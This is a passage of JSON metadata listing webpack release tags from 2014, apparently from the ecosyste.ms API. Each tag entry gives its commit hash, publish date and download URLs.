7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","